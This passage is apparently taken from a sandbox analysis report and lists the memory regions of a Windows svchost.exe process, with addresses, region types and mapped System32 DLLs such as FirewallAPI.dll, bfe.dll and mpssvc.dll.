0xcd2bee1fff entry_point = 0x0 region_type = private name = "private_0x000000cd2bee0000" filename = "" Region: id = 15220 start_va = 0xcd2bef0000 end_va = 0xcd2bfadfff entry_point = 0xcd2bef0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 15221 start_va = 0xcd2c030000 end_va = 0xcd2c030fff entry_point = 0x0 region_type = private name = "private_0x000000cd2c030000" filename = "" Region: id = 15222 start_va = 0xcd2c040000 end_va = 0xcd2c040fff entry_point = 0x0 region_type = private name = "private_0x000000cd2c040000" filename = "" Region: id = 15223 start_va = 0xcd2c050000 end_va = 0xcd2c056fff entry_point = 0xcd2c050000 region_type = mapped_file name = "bfe.dll.mui" filename = "\\Windows\\System32\\en-US\\bfe.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\bfe.dll.mui") Region: id = 15224 start_va = 0xcd2c060000 end_va = 0xcd2c083fff entry_point = 0xcd2c060000 region_type = mapped_file name = "firewallapi.dll.mui" filename = "\\Windows\\System32\\en-US\\FirewallAPI.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\firewallapi.dll.mui") Region: id = 15225 start_va = 0xcd2c090000 end_va = 0xcd2c09ffff entry_point = 0x0 region_type = private name = "private_0x000000cd2c090000" filename = "" Region: id = 15226 start_va = 0xcd2c0a0000 end_va = 0xcd2c0a0fff entry_point = 0x0 region_type = private name = "private_0x000000cd2c0a0000" filename = "" Region: id = 15227 start_va = 0xcd2c0b0000 end_va = 0xcd2c0b6fff entry_point = 0x0 region_type = private name = "private_0x000000cd2c0b0000" filename = "" Region: id = 15228 start_va = 0xcd2c0c0000 end_va = 0xcd2c0c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000cd2c0c0000" filename = "" Region: id = 15229 start_va = 0xcd2c0d0000 end_va = 0xcd2c0d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000cd2c0d0000" filename = "" Region: id = 15230 start_va = 0xcd2c0e0000 end_va = 0xcd2c0e7fff entry_point = 0x0 region_type = private name = "private_0x000000cd2c0e0000" filename = "" Region: id = 15231 start_va = 0xcd2c0f0000 end_va = 0xcd2c0f0fff entry_point = 0x0 region_type = private name = "private_0x000000cd2c0f0000" filename = "" Region: id = 15232 start_va = 0xcd2c100000 end_va = 0xcd2c1fffff entry_point = 0x0 region_type = private name = "private_0x000000cd2c100000" filename = "" Region: id = 15233 start_va = 0xcd2c200000 end_va = 0xcd2c2bffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000cd2c200000" filename = "" Region: id = 15234 start_va = 0xcd2c2c0000 end_va = 0xcd2c2c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000cd2c2c0000" filename = "" Region: id = 15235 start_va = 0xcd2c320000 end_va = 0xcd2c326fff entry_point = 0x0 region_type = private name = "private_0x000000cd2c320000" filename = "" Region: id = 15236 start_va = 0xcd2c330000 end_va = 0xcd2c3acfff entry_point = 0xcd2c330000 region_type = mapped_file name = "firewallapi.dll" filename = "\\Windows\\System32\\FirewallAPI.dll" (normalized: "c:\\windows\\system32\\firewallapi.dll") Region: id = 15237 start_va = 0xcd2c3b0000 end_va = 0xcd2c3b6fff entry_point = 0x0 region_type = private name = "private_0x000000cd2c3b0000" filename = "" Region: id = 15238 start_va = 0xcd2c400000 end_va = 0xcd2c4fffff entry_point = 0x0 region_type = private name = "private_0x000000cd2c400000" filename = "" Region: id = 15239 start_va = 0xcd2c500000 end_va = 0xcd2c687fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000cd2c500000" filename = "" Region: id = 15240 start_va = 0xcd2c690000 end_va = 0xcd2c810fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000cd2c690000" filename = "" Region: id = 15241 start_va = 0xcd2c820000 end_va = 0xcd2c91ffff entry_point = 0x0 region_type = private name = "private_0x000000cd2c820000" filename = "" Region: id = 15242 start_va = 0xcd2c920000 end_va = 0xcd2c99ffff entry_point = 0x0 region_type = private name = "private_0x000000cd2c920000" filename = "" Region: id = 15243 start_va = 0xcd2ca00000 end_va = 0xcd2cafffff entry_point = 0x0 region_type = private name = "private_0x000000cd2ca00000" filename = "" Region: id = 15244 start_va = 0xcd2cb00000 end_va = 0xcd2cbfffff entry_point = 0x0 region_type = private name = "private_0x000000cd2cb00000" filename = "" Region: id = 15245 start_va = 0xcd2cc00000 end_va = 0xcd2ccfffff entry_point = 0x0 region_type = private name = "private_0x000000cd2cc00000" filename = "" Region: id = 15246 start_va = 0xcd2cd00000 end_va = 0xcd2cdfffff entry_point = 0x0 region_type = private name = "private_0x000000cd2cd00000" filename = "" Region: id = 15247 start_va = 0xcd2ce00000 end_va = 0xcd2cefffff entry_point = 0x0 region_type = private name = "private_0x000000cd2ce00000" filename = "" Region: id = 15248 start_va = 0xcd2cf00000 end_va = 0xcd2cffffff entry_point = 0x0 region_type = private name = "private_0x000000cd2cf00000" filename = "" Region: id = 15249 start_va = 0xcd2d000000 end_va = 0xcd2d0fffff entry_point = 0x0 region_type = private name = "private_0x000000cd2d000000" filename = "" Region: id = 15250 start_va = 0xcd2d100000 end_va = 0xcd2d1fffff entry_point = 0x0 region_type = private name = "private_0x000000cd2d100000" filename = "" Region: id = 15251 start_va = 0xcd2d200000 end_va = 0xcd2d2fffff entry_point = 0x0 region_type = private name = "private_0x000000cd2d200000" filename = "" Region: id = 15252 start_va = 0xcd2d300000 end_va = 0xcd2d3fffff entry_point = 0x0 region_type = private name = "private_0x000000cd2d300000" filename = "" Region: id = 15253 start_va = 0xcd2d400000 end_va = 0xcd2d4fffff entry_point = 0x0 region_type = private name = "private_0x000000cd2d400000" filename = "" Region: id = 15254 start_va = 0xcd2d500000 end_va = 0xcd2d5fffff entry_point = 0x0 region_type = private name = "private_0x000000cd2d500000" filename = "" Region: id = 15255 start_va = 0xcd2d600000 end_va = 0xcd2d6fffff entry_point = 0x0 region_type = private name = "private_0x000000cd2d600000" filename = "" Region: id = 15256 start_va = 0xcd2d700000 end_va = 0xcd2defffff entry_point = 0x0 region_type = private name = "private_0x000000cd2d700000" filename = "" Region: id = 15257 start_va = 0xcd2df00000 end_va = 0xcd2dffffff entry_point = 0x0 region_type = private name = "private_0x000000cd2df00000" filename = "" Region: id = 15258 start_va = 0xcd2e000000 end_va = 0xcd2e0fffff entry_point = 0x0 region_type = private name = "private_0x000000cd2e000000" filename = "" Region: id = 15259 start_va = 0xcd2e100000 end_va = 0xcd2e1fffff entry_point = 0x0 region_type = private name = "private_0x000000cd2e100000" filename = "" Region: id = 15260 start_va = 0xcd2e200000 end_va = 0xcd2e2fffff entry_point = 0x0 region_type = private name = "private_0x000000cd2e200000" filename = "" Region: id = 15261 start_va = 0xcd2e300000 end_va = 0xcd2e3fffff entry_point = 0x0 region_type = private name = "private_0x000000cd2e300000" filename = "" Region: id = 15262 start_va = 0xcd2e400000 end_va = 0xcd2e4fffff entry_point = 0x0 region_type = private name = "private_0x000000cd2e400000" filename = "" Region: id = 15263 start_va = 0xcd2e500000 end_va = 0xcd2e836fff entry_point = 0xcd2e500000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 15264 start_va = 0xcd2e900000 end_va = 0xcd2e9fffff entry_point = 0x0 region_type = private name = "private_0x000000cd2e900000" filename = "" Region: id = 15265 start_va = 0xcd2ea00000 end_va = 0xcd2eafffff entry_point = 0x0 region_type = private name = "private_0x000000cd2ea00000" filename = "" Region: id = 15266 start_va = 0xcd2eb00000 end_va = 0xcd2ebfffff entry_point = 0x0 region_type = private name = "private_0x000000cd2eb00000" filename = "" Region: id = 15267 start_va = 0xcd2ec00000 end_va = 0xcd2ecfffff entry_point = 0x0 region_type = private name = "private_0x000000cd2ec00000" filename = "" Region: id = 15268 start_va = 0xcd2ed00000 end_va = 0xcd2edfffff entry_point = 0x0 region_type = private name = "private_0x000000cd2ed00000" filename = "" Region: id = 15269 start_va = 0xcd2ee00000 end_va = 0xcd2eefffff entry_point = 0x0 region_type = private name = "private_0x000000cd2ee00000" filename = "" Region: id = 15270 start_va = 0xcd4ffe0000 end_va = 0xcd500dffff entry_point = 0x0 region_type = private name = "private_0x000000cd4ffe0000" filename = "" Region: id = 15271 start_va = 0xcd500e0000 end_va = 0xcd501dffff entry_point = 0x0 region_type = private name = "private_0x000000cd500e0000" filename = "" Region: id = 15272 start_va = 0xcd501e0000 end_va = 0xcd502dffff entry_point = 0x0 region_type = private name = "private_0x000000cd501e0000" filename = "" Region: id = 15273 start_va = 0xcd50300000 end_va = 0xcd503fffff entry_point = 0x0 region_type = private name = "private_0x000000cd50300000" filename = "" Region: id = 15274 start_va = 0xcd50400000 end_va = 0xcd504fffff entry_point = 0x0 region_type = private name = "private_0x000000cd50400000" filename = "" Region: id = 15275 start_va = 0xcd50500000 end_va = 0xcd50506fff entry_point = 0x0 region_type = private name = "private_0x000000cd50500000" filename = "" Region: id = 15276 start_va = 0xcd50600000 end_va = 0xcd506fffff entry_point = 0x0 region_type = private name = "private_0x000000cd50600000" filename = "" Region: id = 15277 start_va = 0xcd50700000 end_va = 0xcd507fffff entry_point = 0x0 region_type = private name = "private_0x000000cd50700000" filename = "" Region: id = 15278 start_va = 0xcd50920000 end_va = 0xcd50926fff entry_point = 0x0 region_type = private name = "private_0x000000cd50920000" filename = "" Region: id = 15279 start_va = 0xcd50a00000 end_va = 0xcd50afffff entry_point = 0x0 region_type = private name = "private_0x000000cd50a00000" filename = "" Region: id = 15280 start_va = 0xcd50b00000 end_va = 0xcd50d00fff entry_point = 0x0 region_type = private name = "private_0x000000cd50b00000" filename = "" Region: id = 15281 start_va = 0xcd50e00000 end_va = 0xcd50efffff entry_point = 0x0 region_type = private name = "private_0x000000cd50e00000" filename = "" Region: id = 15282 start_va = 0xcd51100000 end_va = 0xcd511fffff entry_point = 0x0 region_type = private name = "private_0x000000cd51100000" filename = "" Region: id = 15283 start_va = 0xcd51200000 end_va = 0xcd512fffff entry_point = 0x0 region_type = private name = "private_0x000000cd51200000" filename = "" Region: id = 15284 start_va = 0xcd51300000 end_va = 0xcd513fffff entry_point = 0x0 region_type = private name = "private_0x000000cd51300000" filename = "" Region: id = 15285 start_va = 0xcd51400000 end_va = 0xcd514fffff entry_point = 0x0 region_type = private name = "private_0x000000cd51400000" filename = "" Region: id = 15286 start_va = 0xcd51500000 end_va = 0xcd515fffff entry_point = 0x0 region_type = private name = "private_0x000000cd51500000" filename = "" Region: id = 15287 start_va = 0xcd51600000 end_va = 0xcd516fffff entry_point = 0x0 region_type = private name = "private_0x000000cd51600000" filename = "" Region: id = 15288 start_va = 0xcd51820000 end_va = 0xcd519cbfff entry_point = 0x0 region_type = private name = "private_0x000000cd51820000" filename = "" Region: id = 15289 start_va = 0xcd528e0000 end_va = 0xcd5325ffff entry_point = 0x0 region_type = private name = "private_0x000000cd528e0000" filename = "" Region: id = 15290 start_va = 0xcd53260000 end_va = 0xcd5c94afff entry_point = 0x0 region_type = private name = "private_0x000000cd53260000" filename = "" Region: id = 15291 start_va = 0xcd5c950000 end_va = 0xcda809dfff entry_point = 0x0 region_type = private name = "private_0x000000cd5c950000" filename = "" Region: id = 15292 start_va = 0x7df5ff990000 end_va = 0x7ff5ff98ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ff990000" filename = "" Region: id = 15293 start_va = 0x7ff7b3276000 end_va = 0x7ff7b3277fff entry_point = 0x0 region_type = private name = "private_0x00007ff7b3276000" filename = "" Region: id = 15294 start_va = 0x7ff7b3278000 end_va = 0x7ff7b3279fff entry_point = 0x0 region_type = private name = "private_0x00007ff7b3278000" filename = "" Region: id = 15295 start_va = 0x7ff7b327a000 end_va = 0x7ff7b327bfff entry_point = 0x0 region_type = private name = "private_0x00007ff7b327a000" filename = "" Region: id = 15296 start_va = 0x7ff7b327e000 end_va = 0x7ff7b327ffff entry_point = 0x0 region_type = private name = "private_0x00007ff7b327e000" filename = "" Region: id = 15297 start_va = 0x7ff7b3280000 end_va = 0x7ff7b3281fff entry_point = 0x0 region_type = private name = "private_0x00007ff7b3280000" filename = "" Region: id = 15298 start_va = 0x7ff7b3282000 end_va = 0x7ff7b3283fff entry_point = 0x0 region_type = private name = "private_0x00007ff7b3282000" filename = "" Region: id = 15299 start_va = 0x7ff7b3284000 end_va = 0x7ff7b3285fff entry_point = 0x0 region_type = private name = "private_0x00007ff7b3284000" filename = "" Region: id = 15300 start_va = 0x7ff7b3286000 end_va = 0x7ff7b3287fff entry_point = 0x0 region_type = private name = "private_0x00007ff7b3286000" filename = "" Region: id = 15301 start_va = 0x7ff7b3288000 end_va = 0x7ff7b3289fff entry_point = 0x0 region_type = private name = "private_0x00007ff7b3288000" filename = "" Region: id = 15302 start_va = 0x7ff7b328a000 end_va = 0x7ff7b328bfff entry_point = 0x0 region_type = private name = "private_0x00007ff7b328a000" filename = "" Region: id = 15303 start_va = 0x7ff7b328c000 end_va = 0x7ff7b328dfff entry_point = 0x0 region_type = private name = "private_0x00007ff7b328c000" filename = "" Region: id = 15304 start_va = 0x7ff7b328e000 end_va = 0x7ff7b328ffff entry_point = 0x0 region_type = private name = "private_0x00007ff7b328e000" filename = "" Region: id = 15305 start_va = 0x7ff7b3290000 end_va = 0x7ff7b3291fff entry_point = 0x0 region_type = private name = "private_0x00007ff7b3290000" filename = "" Region: id = 15306 start_va = 0x7ff7b3292000 end_va = 0x7ff7b3293fff entry_point = 0x0 region_type = private name = "private_0x00007ff7b3292000" filename = "" Region: id = 15307 start_va = 0x7ff7b3294000 end_va = 0x7ff7b3295fff entry_point = 0x0 region_type = private name = "private_0x00007ff7b3294000" filename = "" Region: id = 15308 start_va = 0x7ff7b3296000 end_va = 0x7ff7b3297fff entry_point = 0x0 region_type = private name = "private_0x00007ff7b3296000" filename = "" Region: id = 15309 start_va = 0x7ff7b3298000 end_va = 0x7ff7b3299fff entry_point = 0x0 region_type = private name = "private_0x00007ff7b3298000" filename = "" Region: id = 15310 start_va = 0x7ff7b329a000 end_va = 0x7ff7b329bfff entry_point = 0x0 region_type = private name = "private_0x00007ff7b329a000" filename = "" Region: id = 15311 start_va = 0x7ff7b329c000 end_va = 0x7ff7b329dfff entry_point = 0x0 region_type = private name = "private_0x00007ff7b329c000" filename = "" Region: id = 15312 start_va = 0x7ff7b329e000 end_va = 0x7ff7b329ffff entry_point = 0x0 region_type = private name = "private_0x00007ff7b329e000" filename = "" Region: id = 15313 start_va = 0x7ff7b32a0000 end_va = 0x7ff7b339ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff7b32a0000" filename = "" Region: id = 15314 start_va = 0x7ff7b33a0000 end_va = 0x7ff7b33c2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff7b33a0000" filename = "" Region: id = 15315 start_va = 0x7ff7b33c3000 end_va = 0x7ff7b33c3fff entry_point = 0x0 region_type = private name = "private_0x00007ff7b33c3000" filename = "" Region: id = 15316 start_va = 0x7ff7b33c4000 end_va = 0x7ff7b33c5fff entry_point = 0x0 region_type = private name = "private_0x00007ff7b33c4000" filename = "" Region: id = 15317 start_va = 0x7ff7b33c6000 end_va = 0x7ff7b33c7fff entry_point = 0x0 region_type = private name = "private_0x00007ff7b33c6000" filename = "" Region: id = 15318 start_va = 0x7ff7b33c8000 end_va = 0x7ff7b33c9fff entry_point = 0x0 region_type = private name = "private_0x00007ff7b33c8000" filename = "" Region: id = 15319 start_va = 0x7ff7b33ca000 end_va = 0x7ff7b33cbfff entry_point = 0x0 region_type = private name = "private_0x00007ff7b33ca000" filename = "" Region: id = 15320 start_va = 0x7ff7b33ce000 end_va = 0x7ff7b33cffff entry_point = 0x0 region_type = private name = "private_0x00007ff7b33ce000" filename = "" Region: id = 15321 start_va = 0x7ff7b3dc0000 end_va = 0x7ff7b3dccfff entry_point = 0x7ff7b3dc0000 region_type = mapped_file name = "svchost.exe" filename = "\\Windows\\System32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe") Region: id = 15322 start_va = 0x7ffbf5460000 end_va = 0x7ffbf58c9fff entry_point = 0x7ffbf5460000 region_type = mapped_file name = "actxprxy.dll" filename = "\\Windows\\System32\\actxprxy.dll" (normalized: "c:\\windows\\system32\\actxprxy.dll") Region: id = 15323 start_va = 0x7ffbf5c30000 end_va = 0x7ffbf5c4cfff entry_point = 0x7ffbf5c30000 region_type = mapped_file name = "radardt.dll" filename = "\\Windows\\System32\\radardt.dll" (normalized: "c:\\windows\\system32\\radardt.dll") Region: id = 15324 start_va = 0x7ffbf6ea0000 end_va = 0x7ffbf6ed7fff entry_point = 0x7ffbf6ea0000 region_type = mapped_file name = "srumsvc.dll" filename = "\\Windows\\System32\\srumsvc.dll" (normalized: "c:\\windows\\system32\\srumsvc.dll") Region: id = 15325 start_va = 0x7ffbf7160000 end_va = 0x7ffbf7441fff entry_point = 0x7ffbf7160000 region_type = mapped_file name = "esent.dll" filename = "\\Windows\\System32\\esent.dll" (normalized: "c:\\windows\\system32\\esent.dll") Region: id = 15326 start_va = 0x7ffbf75a0000 end_va = 0x7ffbf75b2fff entry_point = 0x7ffbf75a0000 region_type = mapped_file name = "srumapi.dll" filename = "\\Windows\\System32\\srumapi.dll" (normalized: "c:\\windows\\system32\\srumapi.dll") Region: id = 15327 start_va = 0x7ffbf75c0000 end_va = 0x7ffbf75d2fff entry_point = 0x7ffbf75c0000 region_type = mapped_file name = "energyprov.dll" filename = "\\Windows\\System32\\energyprov.dll" (normalized: "c:\\windows\\system32\\energyprov.dll") Region: id = 15328 start_va = 0x7ffbf75e0000 end_va = 0x7ffbf75ecfff entry_point = 0x7ffbf75e0000 region_type = mapped_file name = "ncuprov.dll" filename = "\\Windows\\System32\\ncuprov.dll" (normalized: "c:\\windows\\system32\\ncuprov.dll") Region: id = 15329 start_va = 0x7ffbf75f0000 end_va = 0x7ffbf75fdfff entry_point = 0x7ffbf75f0000 region_type = mapped_file name = "wpnsruprov.dll" filename = "\\Windows\\System32\\wpnsruprov.dll" (normalized: "c:\\windows\\system32\\wpnsruprov.dll") Region: id = 15330 start_va = 0x7ffbf7600000 end_va = 0x7ffbf7616fff entry_point = 0x7ffbf7600000 region_type = mapped_file name = "appsruprov.dll" filename = "\\Windows\\System32\\appsruprov.dll" (normalized: "c:\\windows\\system32\\appsruprov.dll") Region: id = 15331 start_va = 0x7ffbf7620000 end_va = 0x7ffbf763afff entry_point = 0x7ffbf7620000 region_type = mapped_file name = "eeprov.dll" filename = "\\Windows\\System32\\eeprov.dll" (normalized: "c:\\windows\\system32\\eeprov.dll") Region: id = 15332 start_va = 0x7ffbf7640000 end_va = 0x7ffbf7654fff entry_point = 0x7ffbf7640000 region_type = mapped_file name = "nduprov.dll" filename = "\\Windows\\System32\\nduprov.dll" (normalized: "c:\\windows\\system32\\nduprov.dll") Region: id = 15333 start_va = 0x7ffbf7b20000 end_va = 0x7ffbf7b28fff entry_point = 0x7ffbf7b20000 region_type = mapped_file name = "pnpts.dll" filename = "\\Windows\\System32\\pnpts.dll" (normalized: "c:\\windows\\system32\\pnpts.dll") Region: id = 15334 start_va = 0x7ffbf7b30000 end_va = 0x7ffbf7b3dfff entry_point = 0x7ffbf7b30000 region_type = mapped_file name = "npmproxy.dll" filename = "\\Windows\\System32\\npmproxy.dll" (normalized: "c:\\windows\\system32\\npmproxy.dll") Region: id = 15335 start_va = 0x7ffbf7b40000 end_va = 0x7ffbf7ca5fff entry_point = 0x7ffbf7b40000 region_type = mapped_file name = "diagperf.dll" filename = "\\Windows\\System32\\diagperf.dll" (normalized: "c:\\windows\\system32\\diagperf.dll") Region: id = 15336 start_va = 0x7ffbf9380000 end_va = 0x7ffbf96f5fff entry_point = 0x7ffbf9380000 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\System32\\iertutil.dll" (normalized: "c:\\windows\\system32\\iertutil.dll") Region: id = 15337 start_va = 0x7ffbf9700000 end_va = 0x7ffbf980efff entry_point = 0x7ffbf9700000 region_type = mapped_file name = "mrmcorer.dll" filename = "\\Windows\\System32\\MrmCoreR.dll" (normalized: "c:\\windows\\system32\\mrmcorer.dll") Region: id = 15338 start_va = 0x7ffbf99c0000 end_va = 0x7ffbf9a1efff entry_point = 0x7ffbf99c0000 region_type = mapped_file name = "wlanapi.dll" filename = "\\Windows\\System32\\wlanapi.dll" (normalized: "c:\\windows\\system32\\wlanapi.dll") Region: id = 15339 start_va = 0x7ffbf9af0000 end_va = 0x7ffbf9afbfff entry_point = 0x7ffbf9af0000 region_type = mapped_file name = "wfapigp.dll" filename = "\\Windows\\System32\\wfapigp.dll" (normalized: "c:\\windows\\system32\\wfapigp.dll") Region: id = 15340 start_va = 0x7ffbf9c90000 end_va = 0x7ffbf9c97fff entry_point = 0x7ffbf9c90000 region_type = mapped_file name = "wship6.dll" filename = "\\Windows\\System32\\wship6.dll" (normalized: "c:\\windows\\system32\\wship6.dll") Region: id = 15341 start_va = 0x7ffbf9ca0000 end_va = 0x7ffbf9ca7fff entry_point = 0x7ffbf9ca0000 region_type = mapped_file name = "wshtcpip.dll" filename = "\\Windows\\System32\\WSHTCPIP.DLL" (normalized: "c:\\windows\\system32\\wshtcpip.dll") Region: id = 15342 start_va = 0x7ffbf9d70000 end_va = 0x7ffbf9d79fff entry_point = 0x7ffbf9d70000 region_type = mapped_file name = "wshqos.dll" filename = "\\Windows\\System32\\wshqos.dll" (normalized: "c:\\windows\\system32\\wshqos.dll") Region: id = 15343 start_va = 0x7ffbf9f60000 end_va = 0x7ffbf9f7cfff entry_point = 0x7ffbf9f60000 region_type = mapped_file name = "wdi.dll" filename = "\\Windows\\System32\\wdi.dll" (normalized: "c:\\windows\\system32\\wdi.dll") Region: id = 15344 start_va = 0x7ffbfa220000 end_va = 0x7ffbfa25efff entry_point = 0x7ffbfa220000 region_type = mapped_file name = "netprofm.dll" filename = "\\Windows\\System32\\netprofm.dll" (normalized: "c:\\windows\\system32\\netprofm.dll") Region: id = 15345 start_va = 0x7ffbfad90000 end_va = 0x7ffbfadbefff entry_point = 0x7ffbfad90000 region_type = mapped_file name = "dps.dll" filename = "\\Windows\\System32\\dps.dll" (normalized: "c:\\windows\\system32\\dps.dll") Region: id = 15346 start_va = 0x7ffbfb2c0000 end_va = 0x7ffbfb2c9fff entry_point = 0x7ffbfb2c0000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 15347 start_va = 0x7ffbfba40000 end_va = 0x7ffbfba49fff entry_point = 0x7ffbfba40000 region_type = mapped_file name = "adhapi.dll" filename = "\\Windows\\System32\\adhapi.dll" (normalized: "c:\\windows\\system32\\adhapi.dll") Region: id = 15348 start_va = 0x7ffbfba50000 end_va = 0x7ffbfbae1fff entry_point = 0x7ffbfba50000 region_type = mapped_file name = "msvcp110_win.dll" filename = "\\Windows\\System32\\msvcp110_win.dll" (normalized: "c:\\windows\\system32\\msvcp110_win.dll") Region: id = 15349 start_va = 0x7ffbfbaf0000 end_va = 0x7ffbfbb28fff entry_point = 0x7ffbfbaf0000 region_type = mapped_file name = "policymanager.dll" filename = "\\Windows\\System32\\policymanager.dll" (normalized: "c:\\windows\\system32\\policymanager.dll") Region: id = 15350 start_va = 0x7ffbfbb30000 end_va = 0x7ffbfbb38fff entry_point = 0x7ffbfbb30000 region_type = mapped_file name = "httpprxc.dll" filename = "\\Windows\\System32\\httpprxc.dll" (normalized: "c:\\windows\\system32\\httpprxc.dll") Region: id = 15351 start_va = 0x7ffbfbd20000 end_va = 0x7ffbfbd54fff entry_point = 0x7ffbfbd20000 region_type = mapped_file name = "fwpolicyiomgr.dll" filename = "\\Windows\\System32\\fwpolicyiomgr.dll" (normalized: "c:\\windows\\system32\\fwpolicyiomgr.dll") Region: id = 15352 start_va = 0x7ffbfbd60000 end_va = 0x7ffbfbe39fff entry_point = 0x7ffbfbd60000 region_type = mapped_file name = "mpssvc.dll" filename = "\\Windows\\System32\\MPSSVC.dll" (normalized: "c:\\windows\\system32\\mpssvc.dll") Region: id = 15353 start_va = 0x7ffbfbe40000 end_va = 0x7ffbfbe75fff entry_point = 0x7ffbfbe40000 region_type = mapped_file name = "xmllite.dll" filename = "\\Windows\\System32\\xmllite.dll" (normalized: "c:\\windows\\system32\\xmllite.dll") Region: id = 15354 start_va = 0x7ffbfbe80000 end_va = 0x7ffbfbf49fff entry_point = 0x7ffbfbe80000 region_type = mapped_file name = "bfe.dll" filename = "\\Windows\\System32\\BFE.DLL" (normalized: "c:\\windows\\system32\\bfe.dll") Region: id = 15355 start_va = 0x7ffbfc740000 end_va = 0x7ffbfc831fff entry_point = 0x7ffbfc740000 region_type = mapped_file name = "ucrtbase.dll" filename = "\\Windows\\System32\\ucrtbase.dll" (normalized: "c:\\windows\\system32\\ucrtbase.dll") Region: id = 15356 start_va = 0x7ffbfc840000 end_va = 0x7ffbfc8dafff entry_point = 0x7ffbfc840000 region_type = mapped_file name = "msvcp_win.dll" filename = "\\Windows\\System32\\msvcp_win.dll" (normalized: "c:\\windows\\system32\\msvcp_win.dll") Region: id = 15357 start_va = 0x7ffbfced0000 end_va = 0x7ffbfcf37fff entry_point = 0x7ffbfced0000 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 15358 start_va = 0x7ffbfcfa0000 end_va = 0x7ffbfcfb9fff entry_point = 0x7ffbfcfa0000 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll") Region: id = 15359 start_va = 0x7ffbfcfc0000 end_va = 0x7ffbfcfd5fff entry_point = 0x7ffbfcfc0000 region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll") Region: id = 15360 start_va = 0x7ffbfd340000 end_va = 0x7ffbfd355fff entry_point = 0x7ffbfd340000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 15361 start_va = 0x7ffbfd9f0000 end_va = 0x7ffbfdaaffff entry_point = 0x7ffbfd9f0000 region_type = mapped_file name = "taskschd.dll" filename = "\\Windows\\System32\\taskschd.dll" (normalized: "c:\\windows\\system32\\taskschd.dll") Region: id = 15362 start_va = 0x7ffbfdeb0000 end_va = 0x7ffbfdf14fff entry_point = 0x7ffbfdeb0000 region_type = mapped_file name = "wevtapi.dll" filename = "\\Windows\\System32\\wevtapi.dll" (normalized: "c:\\windows\\system32\\wevtapi.dll") Region: id = 15363 start_va = 0x7ffbfe0d0000 end_va = 0x7ffbfe0dafff entry_point = 0x7ffbfe0d0000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 15364 start_va = 0x7ffbfe0f0000 end_va = 0x7ffbfe127fff entry_point = 0x7ffbfe0f0000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 15365 start_va = 0x7ffbfe5c0000 end_va = 0x7ffbfe5d2fff entry_point = 0x7ffbfe5c0000 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 15366 start_va = 0x7ffbfec30000 end_va = 0x7ffbfecf7fff entry_point = 0x7ffbfec30000 region_type = mapped_file name = "coremessaging.dll" filename = "\\Windows\\System32\\CoreMessaging.dll" (normalized: "c:\\windows\\system32\\coremessaging.dll") Region: id = 15367 start_va = 0x7ffbff210000 end_va = 0x7ffbff236fff entry_point = 0x7ffbff210000 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 15368 start_va = 0x7ffbff5d0000 end_va = 0x7ffbff601fff entry_point = 0x7ffbff5d0000 region_type = mapped_file name = "fwbase.dll" filename = "\\Windows\\System32\\fwbase.dll" (normalized: "c:\\windows\\system32\\fwbase.dll") Region: id = 15369 start_va = 0x7ffbff7c0000 end_va = 0x7ffbff7e2fff entry_point = 0x7ffbff7c0000 region_type = mapped_file name = "gpapi.dll" filename = "\\Windows\\System32\\gpapi.dll" (normalized: "c:\\windows\\system32\\gpapi.dll") Region: id = 15370 start_va = 0x7ffbff9b0000 end_va = 0x7ffbff9f7fff entry_point = 0x7ffbff9b0000 region_type = mapped_file name = "authz.dll" filename = "\\Windows\\System32\\authz.dll" (normalized: "c:\\windows\\system32\\authz.dll") Region: id = 15371 start_va = 0x7ffbffaf0000 end_va = 0x7ffbffafbfff entry_point = 0x7ffbffaf0000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 15372 start_va = 0x7ffbffbe0000 end_va = 0x7ffbffc11fff entry_point = 0x7ffbffbe0000 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 15373 start_va = 0x7ffbffdc0000 end_va = 0x7ffbffdf2fff entry_point = 0x7ffbffdc0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") 